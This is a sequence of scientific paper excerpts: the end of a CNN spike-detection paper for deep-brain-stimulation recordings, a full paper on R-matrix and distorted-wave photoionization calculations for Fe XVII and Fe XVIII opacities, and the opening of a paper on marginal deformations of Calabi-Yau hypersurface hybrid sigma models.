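        model.eval()
        preds, targets = [], []
        with torch.no_grad():
            for windows, labels in val_loader:
                preds.append(model(windows).argmax(dim=1))
                targets.append(labels.argmax(dim=1))
        print(epoch, binary_metrics(torch.cat(preds), torch.cat(targets)))
        torch.save(model.state_dict(), f"checkpoint_epoch{epoch:02d}.pt")
```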
## 5 Summary and Conclusions In this paper, we presented the use of deep learning with convolutional neural networks to automatically detect spikes in recordings from DBS surgery. The best model achieved an accuracy of 0.9898 and an \(F_{1}\) score of 0.9898. The binary classifier has yielded promising results for accelerating automatic spike detection, and training on only 50% of the original training set still gave satisfactory results. The high value of the AUC metric (0.990) means that the classifier is good at recognizing the individual classes: it can distinguish spikes from noise contained in the recording and from overlapping spikes. The classifier can be used to find spikes faster for subsequent spike sorting, and it can also search for valid spikes in a distorted recording containing a large amount of noise. Figure 7: ROC curve for best model
2308.14880
R-Matrix calculations for opacities: IV. Convergence, completeness, and comparison of relativistic R-matrix and distorted wave calculations for FeXVII and FeXVIII
To investigate the completeness of coupled channel (CC) Breit-Pauli R-Matrix (BPRM) calculations for opacities, we employ the relativistic distorted wave (RDW) method to complement (``top-up'') and compare the BPRM photoionization cross sections for high-$n\ell$ levels of both FeXVII and FeXVIII. Good agreement is found in background photoionization cross sections using these two methods, which also ensures correct matching of bound level cross sections for completeness. In order to top-up the CC-BPRM calculations, bound-bound transitions involving additional bound levels, and a large number of doubly-excited quasi-bound levels corresponding to BPRM autoionizing resonances described in paper RMOPII, are calculated using the RDW method. Photoionization cross sections in the high energy region are also computed and compared up to about 500 $Ry$, and contributions from higher core level excitations than BPRM are considered. The effect of configuration interaction is investigated, which plays a significant role in correctly reproducing some background cross sections. Owing to the fact that the additional RDW levels correspond to high-$n\ell$ bound levels that are negligibly populated according to the Mihalas-Hummer-D\"{a}ppen equation-of-state (Paper I), the effect on opacities is expected to be small.
L. Zhao, S. N. Nahar, W. Eissner, A. K. Pradhan
2023-08-28T20:09:39Z
http://arxiv.org/abs/2308.14880v1
R-Matrix calculations for opacities: IV: Convergence, completeness, and comparison of relativistic R-matrix and distorted wave calculations for Fe xvii and Fe xviii ###### Abstract To investigate the completeness of coupled channel (CC) Breit-Pauli R-Matrix (BPRM) calculations for opacities, we employ the relativistic distorted wave (RDW) method to complement ("top-up") and compare the BPRM photoionization cross sections for high-\(n\ell\) levels of both Fe xvii and Fe xviii. Good agreement is found in background photoionization cross sections using these two methods, which also ensures correct matching of bound level cross sections for completeness. In order to top-up the CC-BPRM calculations, bound-bound transitions involving additional bound levels, and a large number of doubly-excited quasi-bound levels corresponding to BPRM autoionizing resonances described in paper RMOPII, are calculated using the RDW method. Photoionization cross sections in the high energy region are also computed and compared up to about 500 \(Ry\), and contributions from higher core level excitations than BPRM are considered. The effect of configuration interaction is investigated, which plays a significant role in correctly reproducing some background cross sections. Owing to the fact that the additional RDW levels correspond to high-\(n\ell\) bound levels that are negligibly populated according to the Mihalas-Hummer-Dappen equation-of-state (paper I), the effect on opacities is expected to be small. ## 1 Introduction Previous papers I-III in this series (hereafter RMOP1, RMOP2, RMOP3) reported BPRM calculations and plasma effects related to iron opacity at conditions similar to the solar radiation/convection zone boundary or the base of the convection zone (BCZ). As outlined in paper RMOP1, opacity calculations need to consider all possible mechanisms for photon absorption and scattering from all atomic constituents, including all levels that might possibly contribute. Furthermore, in order to resolve discrepancies among various theoretical models based on DW methods that include different sets of transition arrays, as well as with experimental measurements [1, 2], it is necessary to establish convergence of the BPRM calculations and completeness of the transitions considered. Extensive CC-BPRM calculations were carried out for Fe xvii including 60 fine-structure levels within the \(n\leq 3\) complexes of the Fe xviii target ion [3], and 99 \(LS\) terms within \(n\leq 4\) (99LS-RM). They show strong photon absorption due to core excitation, resulting in an increment of 35% in the Rosseland mean opacity over the Opacity Project (OP) data [4]. Whereas these previous calculations demonstrated that convergence of the close-coupling expansion is a necessary condition for accuracy in \(R\)-Matrix opacity calculations, completeness with respect to all possible excited configurations, via additional contributions in the high-energy region, still remains to be ascertained [4, 5, 6]. At BCZ conditions Fe xvii, Fe xviii and Fe xix are the three dominant iron ions. For example, at the temperature and density of the measured iron opacity [2], T\(=2.1\times 10^{6}\) K and N\({}_{e}=3.1\times 10^{22}\) cm\({}^{-3}\), the three ionization fractions are 0.19, 0.38 and 0.29, respectively [4]. In this paper, we consider the 218CC-BPRM calculation for Fe xvii and the 276CC-BPRM calculation for Fe xviii, as described in paper RMOP2.
The additional or topup transitions for bound-bound and bound-free data are obtained from relativistic distorted wave (RDW) calculations using the flexible atomic code (FAC) [7]. In the following sections, the specifications of the 218CC- and 276CC-BPRM calculations of paper RMOP2 are summarized, followed by the top-up configurations and transitions calculated using FAC. To ensure data correspondence from FAC, a procedure of matching the bound levels from BPRM and FAC results is described, and the bound-bound and bound-free top-up calculations detailed afterwards. A key step in the matching-topup procedure is level identification. Unlike atomic structure and DW calculations, BPRM calculations do not assign spectroscopic designations _a priori_ and bound states are obtained only as eigenvalues of the (e + ion) Hamiltonian. As described in paper RMOP2, the code BPID (Fig. 1, RMOP-I) is used to obtain relevant parameters and for spectroscopic identification of levels computed in BPRM calculations. The RDW calculations of course have a pre-assigned identification based on initial set of electronic configurations specified in the configuration-interaction (CI) basis. In some instances exited level configuration mixing is such that one configuration does not dominate the wavefunction expansion of a given state and RDW and BPRM assignations do not match. It is then required to carefully examine level parameters such as quantum defects and associated bound-bound and bound-free transitions to ascertain matching data. Another consideration is that the precise number of BPRM bound-state eigenvalues depends on an energy mesh or effective quantum number \(\nu(E)\) obtained by "scanning" at a fine mesh with sufficient refinement to ensure convergence. The procedure and results are discussed in this paper. A potentially important factor is that the close coupling approximation introduces autoionizing resonances in photoionization cross section, which may be affected by radiative damping in highly charged H- or He-like ions, and thereby reduce effective cross sections considerably [16]. However, radiation damping occurs _after_ photoabsorption, and for ions such as Fe xvii and Fe xviii this effect is negligible [13, 14]. Therefore, undamped photoionization cross sections are used in opacity calculations, as reported in paper RMOP2. ## 2 BPRM bound-free and bound-bound data The current BPRM calculations for Fe xvii and Fe xviii are unprecedented in terms of scope and magnitude of data produced and processed for opacity calculations, with the maximum number of free channels 998 and 1288 respectively, from calculations reported in RMOP2. For Fe xvii, 99LS-RM calculation [4] is extended to 218CC-BPRM by including the fine structure of the target states. The target configurations (\(1s\) is always full, so omitted for brevity) included are \(2s^{2}2p^{5}\), \(2s2p^{6}\), \(2s^{2}2p^{4}n\ell\), \(2s2p^{5}n\ell\), \(2p^{6}3\ell^{\prime}\), where \(n=3,\ 4\), and \(\ell,\ \ell^{\prime}\leq 2\), which have 99 \(LS\) terms, or 218 fine structure levels. The continuum orbitals included are \(\ell\leq 9\), and the number of continuum \(R\)-Matrix basis functions included is 20. The bound states are found by scanning the eigenvalues of the (e + ion) Hamiltonian on an effective quantum number \(\nu\) up to \(\nu\leq 10.1\)[8]. 
However, as mentioned above, unlike atomic structure calculations where electronic configurations are specified _a priori_, R-matrix calculations do not provide spectroscopic spin-orbital quantum number designations for the bound levels obtained, nor guarantee that all possible bound levels are found within the \(\nu\)-range of interest. To resolve the first issue, the computer program BPID [9] has been developed as part of the RM opacity codes described in paper P1. Using the code BPID one can identify most of the bound levels spectroscopically, albeit with a few remaining highly mixed levels undetermined (viz. [10]). That obstacle might be overcome by comparing some physical quantities of these levels calculated by an atomic structure code such as SUPERSTRUCTURE [11] and FAC [7], as for example for photoionization cross section to be described in the next section. The second issue depends on the scanning \(\Delta-\nu\)-mesh employed; \(\Delta\nu=0.001\) yields fewer bound levels in the 218CC-BPRM than 60CC-BPRM, so a finer step 0.0001 or 0.0005 is used in the region where levels are missing, which finally gives 464 bound levels, 10 more than 60CC-BPRM. For the larger Fe xviii case, two sets of BPRM calculations are done with different target configurations. One includes up to \(n=3\) target configurations, i.e. \(2s^{2}2p^{4}\), \(2s2p^{5}\), \(2p^{6}\), \(2s^{2}2p^{3}3\ell\), \(2s2p^{4}3\ell\), where \(\ell\leq 2\), which yields 200 target fine structure levels. In addition to target configurations above, the other BPRM calculation includes \(n=4\) configurations, i.e. \(2s^{2}2p^{3}4\ell\), where \(\ell\leq 2\), which yield 276 fine structure levels. The parameters set for the continuum orbitals and basis functions are the same as for Fe xvii 218CC-BPRM calculation. The 200CC-BPRM calculation finds 1149 bound levels with \(\Delta\nu=0.001\), while 276CC-BPRM calculation finds 1163 bound levels with 0.001 as the initial attempt in \(\nu\)-mesh, and 0.0001 or 0.0005 as the second attempt, in the region where levels are missing compared with 200CC-BPRM. Thus we may be confident of having converged with respect to possible number of bound levels with BPRM calculations. To compute iron opacities for Fe xvii and Fe xviii oscillator strengths from the 60CC-BPRM and 200CC-BPRM calculations, and photoionization cross sections from the 218CC-BPRM and 276CC-BPRM calculations, are used respectively (paper RMOP2). So in doing the FAC top-up calculations, matching the bound levels for each BPRM calculation is necessary but complicated by the fact that they have different number of bound levels, especially energy regions where levels are densely packed (see table 1) and the order of their spectroscopic designations may be mismatched and needs to be shuffled (see figure 1).1 Photoionization cross sections of 6 levels of Fe xvii are plotted in figure 1 for 60CC-BPRM and 276CC-BPRM, and we find distinct difference in level 24 and 26. Similar issue arises in figure 1 of Fe xviii. Even though these levels have similar energy, they may have distinctive configurations (see section 3.1), which is the reason why we should redo the identification for different CC-BPRM calculations. After being switched, these levels show good agreement (see figure 1). Footnote 1: It bears emphasis that the opacities _per se_ are independent of any spectroscopic labels; however, they are necessary for processing the bound-bound and bound-free radiative atomic transitions, and for comparing with other data sources. 
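As a rough illustration of the two-pass \(\nu\)-mesh scan, the following Python sketch builds the scanning grid with a coarse \(\Delta\nu\) everywhere and a finer step only inside intervals flagged as possibly missing levels; the interval choices and function name are ours, and the actual bound-state search is of course performed inside the BPRM codes.

```python
import numpy as np

def nu_scan_mesh(nu_max=10.1, coarse=1e-3, refine_regions=(), fine=1e-4):
    """Effective-quantum-number mesh for the bound-state scan: a uniform coarse step
    everywhere, with a finer step inside intervals where levels appear to be missing
    when compared against the smaller-CC calculation. Illustrative bookkeeping only."""
    pieces = [np.arange(coarse, nu_max + coarse / 2, coarse)]
    for lo, hi in refine_regions:
        pieces.append(np.arange(lo, hi, fine))
    return np.unique(np.concatenate(pieces))

# e.g. refine two intervals with the 0.0001 step mentioned in the text
mesh = nu_scan_mesh(refine_regions=[(4.0, 4.2), (7.5, 7.8)], fine=1e-4)
```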
## 3 Complementarity between BPRM and RDW: the top-up procedure The Opacity Project [12] employed a small (e + ion) wavefunction expansion including outer open Shell configurations in the close-coupling approximation and \(R\)-Matrix method in LS-coupling to calculate non-relativistic photoionization cross sections in the low energy region, and adopted the Kramer approximation ("tail") to fit and extend to higher energies afterwards. In previous calculations, [13] replaced the Kramer tails with the RDW results including the contribution from inner-shell processes. Later opacity tables were updated by also including inner-shell transitions [15]. In this section, we describe the procedure employed to compare and complement BPRM data with RDW data from FAC. That requires careful matching between BPRM and FAC cross sections for all bound levels, and detailed bound-bound and bound-free top-up calculations. We \begin{table} \begin{tabular}{|c|c|c|c|} \hline & level index & 60CC-BPRM & 218CC-BPRM \\ \hline Fe xvii & 23 & -1.242945 & -1.239702 \\ & 24 & -1.239540 & -1.238049 \\ & 25 & -1.237855 & -1.236506 \\ & 26 & -1.236421 & -1.235733 \\ & 27 & -1.235081 & -1.235227 \\ & 28 & -1.234742 & -1.234723 \\ \hline & level index & 200CC-BPRM & 276CC-BPRM \\ \hline Fe xviii & 31 & -3.996445 & -4.004678 \\ & 32 & -3.993010 & -4.003468 \\ & 33 & -3.989362 & -4.000058 \\ \hline \end{tabular} \end{table} Table 1: Selected packed levels of Fe xvii (\(J=4,\pi=0\)) and Fe xviii (\(J=5/2,\pi=0\)) (Note: the energy is \(z\)-scaled, and in unit of \(10^{-2}\)_Ry_) also discuss the effect of configuration interaction on photoionization cross sections. ### Matching In BPRM calculations, bound levels with continuum orbitals \(\ell\leq 9\) and effective quantum number \(\nu\leq 10.1\) are formed by coupling the \(n=2\) core states with the continuum \(\nu\) and \(\ell\) of the outer electron. So in FAC we set the bound configurations as a permutation of the \(n=2\) core configurations and an outer electron with principle quantum number \(n\leq 10\). With the same n-complex configuration interaction included, atomic structure is solved and sorted by total angular momentum \(J\) and parity \(\pi\), and ordered in energy, we find excellent agreement in the energy between BPRM and FAC values. In calculating photoionization cross sections we include the whole \(n\)-complex of Figure 1: Photoionization cross section of 6 closely packed levels for Fe xvii and 3 levels for Fe xviii before and after being switched. 60CC-BPRM (red), 218CC-BPRM (black); 200CC-BPRM (red), 276CC-BPRM (black) core configurations for CI (hereafter CI) purpose, but only the transitions to core configurations that are included in BPRM calculations. To delineate photoionization cross sections at the edges of energy grid, the energy mesh is created in such a way that within any two adjacent thresholds 10 points are uniformly assigned. The partial photoionization cross section is the computed in the default 6 energy grids, and interpolated/extrapolated in our mesh, and summed to give total cross sections for each bound level. To investigate the effect of CI, two sets of RDW calculation are carried out. Both sets only allow the same-\(n\)-complex configuration interaction for bound configurations, but for the core configurations one of them only allows the same-\(n\)-complex CI and the other allows different \(n\)-complexes. We mix all the core configurations together. 
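For concreteness, the threshold-resolved energy mesh described above (10 uniformly spaced points between each pair of adjacent ionization thresholds) can be sketched as follows; the threshold values in the example are made up, and in practice they would come from the target-level energies of the calculation.

```python
import numpy as np

def threshold_mesh(thresholds, points_per_interval=10):
    """Photon-energy mesh with a fixed number of uniformly spaced points between
    each pair of adjacent ionization thresholds, so that edges in the cross
    section are delineated."""
    thresholds = np.sort(np.asarray(thresholds, dtype=float))
    pieces = [np.linspace(lo, hi, points_per_interval, endpoint=False)
              for lo, hi in zip(thresholds[:-1], thresholds[1:])]
    pieces.append(thresholds[-1:])          # keep the last threshold itself
    return np.concatenate(pieces)

# Example with illustrative threshold energies (Ry)
mesh = threshold_mesh([50.0, 52.3, 55.1, 60.8])
```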
In RDW calculations, the photoionization cross section is related to the dipole operator matrix \(<\psi_{i}|\mathbb{D}|\psi_{f}>\). The \(|\psi_{i}>\) involves the electron in the bound state to the continuum and all other electrons, and must stay the same if only same-\(n\)-complex configuration interaction is allowed. It can be different if different-\(n\)-complex CI is considered [7]. To match bound state levels from BPRM and RDW, it is necessary to compare cross sections to ensure the correctness of matching. We plot BPRM and RDW photoionization cross sections in the order of energy for each \(J\), \(\pi\) symmetry pair, and a level is matched when the energy and the photoionization cross section agree reasonably well (here the background of the BPRM data and RDW are compared). Photoionization cross sections of majority of bound levels show excellent consistency at the first attempt (see figure 1 for Fe xvii and Fe xviii. The \(LS\)-term notation ( \(S\) and \(L\)) can not be determined from FAC output for all levels, so only configuration and total angular momentum \(J\) are given). However, when several levels are almost degenerate (see table 2), distinctive differences may yet occur in cross sections. Such levels need to be switched till good matching is achieved (See figure 3 for Fe xvii and Fe xviii The process is justified since level identification of near-degenerate BPRM levels may not exactly correspond in energy from different atomic structure codes such as FAC, since spectroscopic designations depend on CI included and coupling schemes employed for the (e + ion) system1. Footnote 1: All BPRM photoionization cross sections include a small region below the lowest ionization threshold for each level [12], where no RDW data are shown. In table 2, we can see the energy levels computed in BPRM and RDW agree quite well. For Fe xvii, levels 13 and 14, and levels 15 and 16 lie very close to each other, and in figure 3, levels 13 and 16 achieve good agreement, while levels 14 and 15 don't. So we switch the order of levels 14 and 15 in RDW calculation and recompare with good agreement. Thus levels 13 - 16 in BPRM calculation are matched with those in RDW calculation. The same procedure is applied to levels 65 and 66 of Fe xviii in table 2, and the result is show in figure 3. In figures 2 and 3, we show two sets of RDW calculation as described above, and study the effect of configuration interaction on photoionization cross sections, with the upper panel of figure 2 as an example. The dominant configuration of the bound state after being matched with RDW is \(2s^{2}2p^{5}4d\), so with only the same-\(n\)-complex CI of core configurations considered, the transitions can only happen to core configurations \(2s^{2}2p^{5}\), \(2s2p^{5}4\ell\), \(2s^{2}2p^{4}4\ell\) and \(2p^{6}4\ell\), where \(\ell=s,p,d\), while with different-\(n\)-complex CI of core configurations additional contribution can be from all other core configurations. From the upper panel of figure 2 we can see that the same-\(n\)-complex configuration interaction gives reasonably good background, though with some big gaps, while different-\(n\)-complex CI fills up the big gap and improves the background significantly. Similar phenomenon can be found in the rest of the figures 2 and 3, and there are still some gaps remaining after different-\(n\)-complex CI is allowed3 Footnote 3: In figure 2 and 3, the oscillation in the background of the BPRM data can be eliminated with a larger number of continuum basis functions [13]. 
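The matching-and-switching step can be illustrated schematically. The sketch below compares BPRM and RDW background cross sections for a nearly degenerate pair of levels on a common energy mesh and keeps whichever assignment (direct or swapped) agrees better; the similarity measure (mean absolute difference of the log cross sections) is our choice and is not prescribed in the text.

```python
import numpy as np

def background_distance(sigma_a, sigma_b):
    """Mean absolute difference of log10 cross sections on a common energy grid."""
    return float(np.mean(np.abs(np.log10(sigma_a) - np.log10(sigma_b))))

def match_pair(bprm, rdw):
    """bprm, rdw: dicts {level_index: cross-section array on the same energy mesh}
    for two nearly degenerate levels. Keep the identity assignment unless swapping
    the pair gives a smaller total mismatch of the backgrounds."""
    i, j = sorted(bprm)
    direct = background_distance(bprm[i], rdw[i]) + background_distance(bprm[j], rdw[j])
    swapped = background_distance(bprm[i], rdw[j]) + background_distance(bprm[j], rdw[i])
    return {i: i, j: j} if direct <= swapped else {i: j, j: i}
```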
### Bound-free data As BPRM calculations are carried out in the lower part of the whole energy range, they include low-\(n\ell\) core configurations with \(n\leq 4\). We use the RDW method to extend it to higher regions up to 500 \(Ry\) in photoelectron energy, and to include higher-\(n\ell\) core configurations \(n=5,6\). The following part of this section gives detailed description of these aspects. #### 3.2.1 High energy cross sections As shown in figure 2, the RDW data can be matched almost perfectly to background BPRM cross sections. However, we also find there are cases where they don't match well in the right region of energy (see figure 4). In the top panels different-\(n\) CI introduces many transitions, but they are not strong enough to raise to the background of BPRM. In the middle panel of figure 4, different-\(n\) CI introduces many edges at positions where the background of BPRM jumps, and raises \begin{table} \begin{tabular}{|c||c|c|c|} \hline & level index & BPRM & RDW \\ \hline Fe xvii & 12 & -3.670657 & -3.67960 \\ & 13 & -2.873930 & -2.84319 \\ & 14 & -2.868775 & -2.84238 \\ & 15 & -2.842915 & -2.83761 \\ & 16 & -2.835625 & -2.83555 \\ & 17 & -2.774853 & -2.77998 \\ \hline & level index & BPRM & RDW \\ \hline Fe xviii & 64 & -1.275887 & -1.27703 \\ & 65 & -1.234865 & -1.24175 \\ & 66 & -1.226084 & -1.23724 \\ & 67 & -1.136909 & -1.14691 \\ \hline \end{tabular} \end{table} Table 2: Selected levels of Fe xvii (\(J=3,\pi=1\)) and Fe xviii (\(J=1/2,\pi=1\)) to be matched (Note: the energy is \(z\)-scaled, and in unit of \(10^{-2}Ry\)) the background higher than BPRM. While in the middle panel of figure 4, around \(105Ry\), compared with same-\(n\) CI, different-n CI moves the background up on the left side, and down on the right side, i.e. converging to the background of BPRM. As close-coupling approximation treats CI more completely and accurately, we multiply the RDW data in the higher energy region by a factor which is the ratio of BPRM value and RDW value at the last point of BPRM calculation for each level (see figure 5), to account for the discrepancy between BPRM and RDW. In figure 5, the distribution of the factors applied in the higher region is very alike for Fe xvii and Fe xviii, and there are around 60% of the bound levels lying around ratio = 1. Among the high-ratio cases, some are caused by the oscillation of the background of BPRM, which is due to the small number of photons in the spectrum. The difference between the BPRM and RDW values is due to the fact that the background of BPRM is not affected by the background of BPRM. Figure 2: Most of the levels are matched at the first attempt with excellent consistency in photoionization cross section. The configuration is attached with each level. BPRM (black), RDW(blue and red). “Same-n CI” means only same-n-complex CI is considered for core configurations, and “different-n CI” refers to both same-n- and different-n-complex CI is considered. Figure 3: Multiple attempts are needed to ensure the correct matching when the levels are found with discrepancy in the photoionization cross section. In?? and?? the discrepancy is shown in upper panel and the final matching is in the lower one. Find the configuration attached for each level. BPRM (black), RDW(blue and red). “Same-n CI” refers to only same-n-complex CI is considered for core configurations, and “different-n CI” refers to both same-n- and different-n-complex CI are considered. 
of continuum basis functions used in the wavefunction expansion [13] (see the bottom panels of figure 4. The energy mesh used in the region is created in such a way that 10 points are uniformly assigned between any adjacent ionization thresholds due to the other core configurations (see section 3.2.2). #### 3.2.2 Highly excited core configurations Using RDW with different-n-complex CI, we calculate photoionization cross section due to other core configurations up to \(n=6\) that are not included in the BPRM calculation. To top-up 218CC BPRM for Fe xvii, we include core configurations \(2s^{2}2p^{4}4f\), \(2s2p^{5}4f\), \(2p^{6}4\ell^{\prime}\), \(2s^{S}2p^{P}5\ell^{\prime\prime}\) and \(2s^{S}2p^{P}6\ell^{\prime\prime\prime}\), where \(\ell^{\prime},\ell^{\prime\prime},\ell^{\prime\prime\prime}\) are all possible subshells in the corresponding shell, and \(s\), \(p\) are any possible non-negative integers satisfying \(S+P=6\). To top-up 276CC BPRM for Fe xviii, we include core configurations \(2p^{5}3\ell^{\prime}\), \(2s^{2}2p^{3}4f\), \(2s2p^{4}4\ell^{\prime}\), \(2p^{5}4\ell^{\prime\prime}\), \(2s^{S}2p^{P}5\ell^{\prime\prime\prime}\) and \(2s^{S}2p^{P}6\ell^{\prime\prime\prime\prime}\), where \(\ell^{\prime},\ell^{\prime\prime},\ell^{\prime\prime\prime}\) and \(\ell^{\prime\prime\prime\prime}\) are all possible subshells in the corresponding shell, and \(S\), \(P\) are any possible non-negative integers satisfying \(S+P=5\). The energy mesh is same as the one used in BPRM calculation merged with the one in the high energy region as described in section 3.2. As shown in figure 6, the BPRM data is merged with the scaled RDW tail, and the contribute from other core configurations varies from negligible to noticeable. #### 3.2.3 Highly excited bound levels In RDW, we consider all the bound state levels with \(n\leq 10\), so we collect all such levels that are not included in BPRM calculation, and calculate the photoionization cross section due to all core configurations, i.e. the core configurations included in the BPRM calculation and the other ones displayed in section 3.2.2, with different-n-complex CI. ### Bound-bound data To top-up the bound-bound oscillator strength, we divide it into two parts. One is from bound states to pure bound states. i.e. between negative energy levels. We calculate all such possible transitions, but only collect the ones that are not calculated in BPRM calculations. The other part is from bound states to quasi-bound states, i.e. from negative energy bound levels to positive energy doubly excited states in the continuum. BPRM calculations treat direct photoionization and autoionization as a single unified quantum-mechanical process, as in section 3.2 that discusses direct photoionization is done. To simulate autoionizing resonances, we calculate the oscillator strengths from bound to doubly excited states, among all pairs of negative-positive energies. We consider transitions that excite an electron from \(L\)-shell to a higher one, forming a doubly excited configuration that can not be formed by combining a core configuration used in BPRM calculations with another electron. 
Take Fe xviii for an example, we consider transitions from \(2s^{S}2p^{P}3\ell\) to only \(2p^{5}3\ell^{\prime}n\ell^{\prime\prime}\), where \(S\), \(P\) are any possible non-negative integers satisfying \(S+P=6\), and \(\ell\), \(\ell^{\prime}\), \(\ell^{\prime\prime}\) can be any sub-shell in the corresponding Figure 4: Different-n CI improves the background significantly, but there is still very large discrepancy in the right region of energy for some levels. BPRM (black), RDW(blue and red). “Same-\(n\) CI” refers to only same-n-complex configuration interaction is considered for core configurations, and “different-\(n\) CI” refers to both same-\(n\)- and different-\(n\)-complex configuration interaction are considered. shell, and \(n=3-6\). Since \(2s^{2}2p^{3}\) and \(2s2p^{4}\) are included in 276CC BPRM calculation, \(2s^{2}2p^{3}3\ell^{\prime}n\ell^{\prime\prime}\) and \(2s2p^{4}3\ell^{\prime}n\ell^{\prime\prime}\) are considered naturally. Thus they are excluded in the top-up calculations. The number of quasibound positive energy levels in the continuum is far larger than bound negative energy levels. For Fe xvii we have 587 bound levels as opposed to \(\sim\)72,000 positive energy levels included as top-up. For Fe xviii we obtain 1,154 bound levels vs. \(\sim\)175,000 quasibound levels. All possible oscillator strengths among these large number of levels are computed and considered in opacities calculations4. Footnote 4: We also note that oscillator strength data for transitions among quasibound positive energy levels are employed for free-free contribution to plasma broadening of autoionizing resonances, discussed in paper RMOP3 ## 4 Conclusion In order to investigate the effect of convergence and completeness of RMOP data for opacities calculations, complete sets of relativistic distorted wave calculations are carried out for Fe xvii and Fe xviii to compare with and topup the 218CC and 276CC BPRM calculations, respectively. Bound state levels are matched between BPRM and RDW calculation by comparing quantum numbers \(J\), \(\pi\), energy, and cross sections. With such Figure 5: The distribution of the factors multiplied to RDW data in the higher energy region for Fe xvii and Fe xviii. “width” is the width of the bins. Figure 6: The photoionization cross section of the same four levels as in figure 2 are extended to higher energy region and the contribution from other core configurations level correspondence, BPRM photoionization cross sections in the higher energy region are extended by scaled RDW data, and contribution from other core configurations up to \(n=6\) is added, to examine the effect of convergence over and above the \(n\leq 4\) BPRM data. Higher bound state levels are also included with photoionization cross sections due to all core configurations up to \(n=6\). Oscillator strength data corresponding to the additional levels are also topped-up, with contribution from bound-bound and bound-quasibound transitions. The effects of CI on photoionization cross sections are discussed, including same-\(n\)-complex and different-\(n\)-complexes, showing its significant role in reproducing the background of BPRM cross sections using RDW. However, the extensive resonance structures that dominate BPRM photoionization cross sections throughout the energy range considered can not be compared owing to their absence in the RDW data. Nevertheless, the RDW method may provide useful checks on completeness and convergence of CC-BPRM results. 
We have extensively studied the correspondence and complementarity between BPRM and RDW results with a view to ascertaining the possible impact on opacities. However, the local-thermodynamic-equilibrium (LTE) Mihalas-Hummer-Dappen equation-of-state valid in stellar interiors yields extremely small occupation probabilities and level populations for the high-energy and high (e + ion) spin-angular momenta states \(nSLJ\) (discussed in paper P1), implying that the actual effect on opacities would be small. Indeed, preliminary opacity calculations indicate that Rosseland Mean Opacities are enhanced by only a few percent (\(<5\%\)) (results to be reported elsewhere). ## 5 Acknowledgments One of the authors (ZL) would like to thank Dr. Ming Feng Gu for helpful advice in using FAC, and to thank the following colleagues for helping run the BPRM calculations with their resources on the ASC Unity cluster at the Ohio State University (names in alphabetical order): Jiaxin Wu, Keng Yuan Meng, Max Westphal, Xiankun Li, Yonas Getachew and Zhefu Yu. This research was supported by a teaching assistantship from the Dept. of Physics and the Dept. of Astronomy of the Ohio State University (OSU) and by the US National Science Foundation and Dept. of Energy. Computations were carried out at the Ohio Supercomputer Center, the OSU Dept. of Astronomy and the ASC Unity cluster of OSU.
2305.05971
Marginal deformations of Calabi-Yau hypersurface hybrids with (2,2) supersymmetry
We study two-dimensional non-linear sigma models with (2,2) supersymmetry and a holomorphic superpotential that are believed to flow to unitary compact (2,2) superconformal theories with equal left and right central charges c=9. The SCFTs have a set of marginal deformations, and some of these can be realized as deformations of parameters of the UV theory, making it possible to apply techniques such as localization to probe the deformations of the SCFT in terms of a UV Lagrangian. In this work we describe the UV lifts of the remaining SCFT infinitesimal deformations, the so-called non-toric and non-polynomial deformations. Our UV theories naturally arise as geometric phases of gauged linear sigma models, and it may be possible to extend our results to find lifts of all SCFT deformations to the gauged linear sigma model.
Griffen Adams, Ilarion V. Melnikov
2023-05-10T08:29:09Z
http://arxiv.org/abs/2305.05971v1
# Marginal deformations of Calabi-Yau hypersurface hybrids with (2,2) supersymmetry ###### Abstract We study two-dimensional non-linear sigma models with (2,2) supersymmetry and a holomorphic superpotential that are believed to flow to unitary compact (2,2) superconformal theories with central charges \(c_{\mbox{\tiny L}}=c_{\mbox{\tiny R}}=9\). The SCFTs have a set of marginal deformations, and some of these can be realized as deformations of parameters of the UV theory, making it possible to apply techniques such as localization to probe the deformations of the SCFT in terms of a UV Lagrangian. In this work we describe the UV lifts of the remaining SCFT infinitesimal deformations, the so-called non-toric and non-polynomial deformations. Our UV theories naturally arise as geometric phases of gauged linear sigma models, and it may be possible to extend our results to find lifts of all SCFT deformations to the gauged linear sigma model. ###### Contents * 1 Introduction * 2 Warm up: deformations of Calabi-Yau non-linear sigma models * 2.1 Superspace conventions * 2.2 The action and its key symmetries * 2.3 A view of Calabi-Yau deformations * 2.4 A chiral algebra perspective * 3 Hypersurface geometry * 3.1 A little toric geometry * 3.2 Complex structure deformations * 3.3 Complexified Kahler deformations * 4 Marginal operators in the hypersurface hybrid * 4.1 The Lagrangian of the hypersurface hybrid * 4.2 The toric (a,c) deformations * 4.3 The non-toric (a,c) deformations * 4.4 The polynomial deformations * 4.5 The non-polynomial deformations * 5 The NS-R sector of the hypersurface hybrid * 5.1 (a,c) Deformations * 5.2 (c,c) Deformations * 6 Further directions ## 1 Introduction Calabi-Yau compactification plays a central role in the study of string theory in all of its guises and duality frames. One of the oldest of these is the realization that compact Calabi-Yau manifolds have an intimate relation to non-trivial two-dimensional superconformal theories (SCFTs) with (2,2) supersymmetry. Indeed, there is a well-motivated conjecture that given a compact smooth Calabi-Yau manifold \(X\), the (2,2) supersymmetric non-linear sigma model with target space \(X\) can be endowed with a smooth Kahler metric \(g\) and a closed Kalb-Ramond field \(B\) such that the resulting theory is superconformal. More precisely, it is believed that for a fixed choice of complex structure and complexified Kahler class there is a unique Kahler metric \(g\) compatible with these structures such that the non-linear sigma model with target space \(X\) and metric \(g\) is a superconformal field theory [1]. Furthermore, when the volume of \(X\) is taken to be large in string units the metric on \(g\) approaches the unique Ricci-flat Calabi-Yau metric for the fixed complex structure and Kahler class. These familiar notions are of course textbook material [2] discussed in detail in many classic reviews such as [3; 4]. Except at special points in the moduli space, the SCFTs obtained in this way are not solvable, and this is both the challenge and the appeal of the construction. To probe the physics of the putative SCFT a number of powerful methods have been devised. 
Many of these approaches are unified via (2,2) gauged linear sigma models introduced in this context in [5]: for an appropriate choice of parameters these two-dimensional gauge theories are believed to flow to the same SCFT as given by the non-linear sigma model with target space \(X\), where \(X\) is realized as a complete intersection in a toric (or, in the non-abelian case, a Grassmannian or closely related) variety. Techniques based on topological field theory and localization can then be used to probe the strongly-coupled IR dynamics described by the SCFT via UV computations based on a Lagrangian gauge theory. A recent review of these constructions was given in [6]. The results based on such computations have had a profound impact on both mathematical physics, primarily through applications to mirror symmetry, as well as on string compactification, but all such applications have an important caveat: they can only be applied to those IR computations that have a simple UV lift. In this work we tackle the simplest but perhaps also the foundational aspect of this problem: typically a UV lift does not describe the full deformation space of the putative superconformal theory. The issue was already clear in the earliest large-scale constructions of such Calabi-Yau manifolds, the so-called "CICY" manifolds obtained as complete intersections in products of projective spaces [7; 8; 